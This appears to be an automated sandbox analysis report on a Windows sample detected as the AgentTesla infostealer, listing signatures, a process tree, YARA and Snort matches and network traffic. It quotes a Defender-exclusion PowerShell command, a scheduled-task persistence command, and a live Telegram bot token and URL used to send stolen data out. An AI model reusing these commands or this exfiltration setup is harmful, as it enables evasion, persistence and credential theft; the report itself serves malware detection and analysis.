Windows Analysis Report
wKQpOZ58Gl

Overview

General Information

Sample Name: wKQpOZ58Gl (renamed file extension from none to exe)
Analysis ID: 679221
MD5: f7c9cf1410373a60a5c5a5e02aa4bd3c
SHA1: 97cf7689f3b6dfd0efd37e7f16aa1bd2cfe537de
SHA256: b5a23c2ef617a9a0b87f82ebc9f6c2c892a179a53bd35ce725be92c68465b245
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • wKQpOZ58Gl.exe (PID: 3676 cmdline: "C:\Users\user\Desktop\wKQpOZ58Gl.exe" MD5: F7C9CF1410373A60A5C5A5E02AA4BD3C)
    • powershell.exe (PID: 6088 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kqruryFrIFc.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6124 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kqruryFrIFc" /XML "C:\Users\user\AppData\Local\Temp\tmp92BC.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • wKQpOZ58Gl.exe (PID: 3276 cmdline: C:\Users\user\Desktop\wKQpOZ58Gl.exe MD5: F7C9CF1410373A60A5C5A5E02AA4BD3C)
    • wKQpOZ58Gl.exe (PID: 3760 cmdline: C:\Users\user\Desktop\wKQpOZ58Gl.exe MD5: F7C9CF1410373A60A5C5A5E02AA4BD3C)
  • cleanup

Malware Configuration

Telegram RAT: {"C2 url": "https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendMessage"}
AgentTesla: {"Exfil Mode": "Telegram", "Chat id": "1428355250", "Chat URL": "https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument"}

Yara Overview

Memory Dumps:

Source | Rule | Description | Author
0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown
  Strings:
  • 0x300eb:$a13: get_DnsResolver
  • 0x2e909:$a20: get_LastAccessed
  • 0x30a7f:$a27: set_InternalServerPort
  • 0x30d9b:$a30: set_GuidMasterKey
  • 0x2ea10:$a33: get_Clipboard
  • 0x2ea1e:$a34: get_Keyboard
  • 0x2fd1b:$a35: get_ShiftKeyDown
  • 0x2fd2c:$a36: get_AltKeyDown
  • 0x2ea2b:$a37: get_Password
  • 0x2f4cb:$a38: get_PasswordHash
  • 0x304eb:$a39: get_DefaultCredentials
00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Unpacked PEs:

Source | Rule | Description | Author
0.2.wKQpOZ58Gl.exe.4084120.9.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.wKQpOZ58Gl.exe.4084120.9.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.wKQpOZ58Gl.exe.4084120.9.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
  Strings:
  • 0x30e60:$s10: logins
  • 0x308c7:$s11: credential
  • 0x2ce10:$g1: get_Clipboard
  • 0x2ce1e:$g2: get_Keyboard
  • 0x2ce2b:$g3: get_Password
  • 0x2e10b:$g4: get_CtrlKeyDown
  • 0x2e11b:$g5: get_ShiftKeyDown
  • 0x2e12c:$g6: get_AltKeyDown
0.2.wKQpOZ58Gl.exe.4084120.9.unpack | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown
  Strings:
  • 0x2e4eb:$a13: get_DnsResolver
  • 0x2cd09:$a20: get_LastAccessed
  • 0x2ee7f:$a27: set_InternalServerPort
  • 0x2f19b:$a30: set_GuidMasterKey
  • 0x2ce10:$a33: get_Clipboard
  • 0x2ce1e:$a34: get_Keyboard
  • 0x2e11b:$a35: get_ShiftKeyDown
  • 0x2e12c:$a36: get_AltKeyDown
  • 0x2ce2b:$a37: get_Password
  • 0x2d8cb:$a38: get_PasswordHash
  • 0x2e8eb:$a39: get_DefaultCredentials
0.2.wKQpOZ58Gl.exe.404f900.7.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Sigma Overview

No Sigma rule has matched

Snort IDS Alert Overview

Timestamp: 08/05/22-12:24:11.625878
Source IP: 192.168.2.6
Destination IP: 149.154.167.220
Source Port: 49783
Destination Port: 443
Protocol: TCP
SID: 2851779
Classtype: A Network Trojan was detected

AV Detection

Source: wKQpOZ58Gl.exe | Virustotal: Detection: 57%
Source: wKQpOZ58Gl.exe | Metadefender: Detection: 25%
Source: wKQpOZ58Gl.exe | ReversingLabs: Detection: 69%
Source: wKQpOZ58Gl.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\kqruryFrIFc.exe | Avira: detection malicious, Label: TR/AD.AgentTesla.gcmza
Source: C:\Users\user\AppData\Roaming\kqruryFrIFc.exe | Virustotal: Detection: 57%
Source: C:\Users\user\AppData\Roaming\kqruryFrIFc.exe | Metadefender: Detection: 25%
Source: C:\Users\user\AppData\Roaming\kqruryFrIFc.exe | ReversingLabs: Detection: 69%
Source: wKQpOZ58Gl.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\kqruryFrIFc.exe | Joe Sandbox ML: detected
Source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 0.2.wKQpOZ58Gl.exe.4084120.9.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1428355250", "Chat URL": "https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument"}
Source: wKQpOZ58Gl.exe.3760.14.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendMessage"}
Source: wKQpOZ58Gl.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49783 version: TLS 1.2
Source: wKQpOZ58Gl.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.6:49783 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.wKQpOZ58Gl.exe.4084120.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.wKQpOZ58Gl.exe.404f900.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.wKQpOZ58Gl.exe.40186e0.8.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
  POST /bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8da76e30dae4492
  Host: api.telegram.org
  Content-Length: 1019
  Expect: 100-continue
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  POST /bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8da76e3c93cca40
  Host: api.telegram.org
  Content-Length: 1900
  Expect: 100-continue
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443
Source: wKQpOZ58Gl.exe, kqruryFrIFc.exe.0.dr | String found in binary or memory: =Are you sure you want to exit?ExitWhttps://github.com/princ3od/MaterialSurfaceKhttps://www.linkedin.com/in/princ3od/%princ3od@gmail.com]My email has been already copied to clipboard! equals www.linkedin.com (Linkedin)
Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: wKQpOZ58Gl.exe, 0000000E.00000002.639326716.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639615093.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639326716.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639182904.0000000002C49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://dhp6cb4d3QXSx5sRl.net
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sOkRpA.com
Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639234728.0000000002C51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org%
Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org%%startupfolder%
Source: wKQpOZ58Gl.exe, 0000000E.00000002.639234728.0000000002C51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: wKQpOZ58Gl.exe, 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/
Source: wKQpOZ58Gl.exe, 0000000E.00000002.639234728.0000000002C51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument
Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocumentdocument-----
Source: wKQpOZ58Gl.exe, 0000000E.00000002.639234728.0000000002C51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4
Source: wKQpOZ58Gl.exe, 0000000E.00000002.639615093.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.orgD8
Source: wKQpOZ58Gl.exe, kqruryFrIFc.exe.0.dr | String found in binary or memory: https://github.com/princ3od/MaterialSurfaceKhttps://www.linkedin.com/in/princ3od/%princ3od
Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | HTTP traffic detected:
  POST /bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8da76e30dae4492
  Host: api.telegram.org
  Content-Length: 1019
  Expect: 100-continue
  Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.telegram.org
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49783 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\wKQpOZ58Gl.exe
Source: wKQpOZ58Gl.exe, 00000000.00000002.436014526.000000000074B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\wKQpOZ58Gl.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 0.2.wKQpOZ58Gl.exe.4084120.9.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.wKQpOZ58Gl.exe.4084120.9.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.wKQpOZ58Gl.exe.404f900.7.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.wKQpOZ58Gl.exe.404f900.7.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.wKQpOZ58Gl.exe.4084120.9.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.wKQpOZ58Gl.exe.4084120.9.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.wKQpOZ58Gl.exe.404f900.7.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.wKQpOZ58Gl.exe.404f900.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.wKQpOZ58Gl.exe.40186e0.8.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.wKQpOZ58Gl.exe.40186e0.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: wKQpOZ58Gl.exe PID: 3676, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: wKQpOZ58Gl.exe PID: 3760, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, <PrivateImplementationDetails>{BACE69AF-4266-41D0-90EC-726D46EDE141}/ED527976-56C3-4852-B8A5-4D38F8259308.cs | Large array initialization: .cctor: array initializer size 11689
Source: wKQpOZ58Gl.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.wKQpOZ58Gl.exe.4084120.9.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.wKQpOZ58Gl.exe.4084120.9.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.wKQpOZ58Gl.exe.404f900.7.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.wKQpOZ58Gl.exe.404f900.7.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.wKQpOZ58Gl.exe.4084120.9.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.wKQpOZ58Gl.exe.4084120.9.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.wKQpOZ58Gl.exe.404f900.7.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.wKQpOZ58Gl.exe.404f900.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.wKQpOZ58Gl.exe.40186e0.8.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.wKQpOZ58Gl.exe.40186e0.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: wKQpOZ58Gl.exe PID: 3676, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
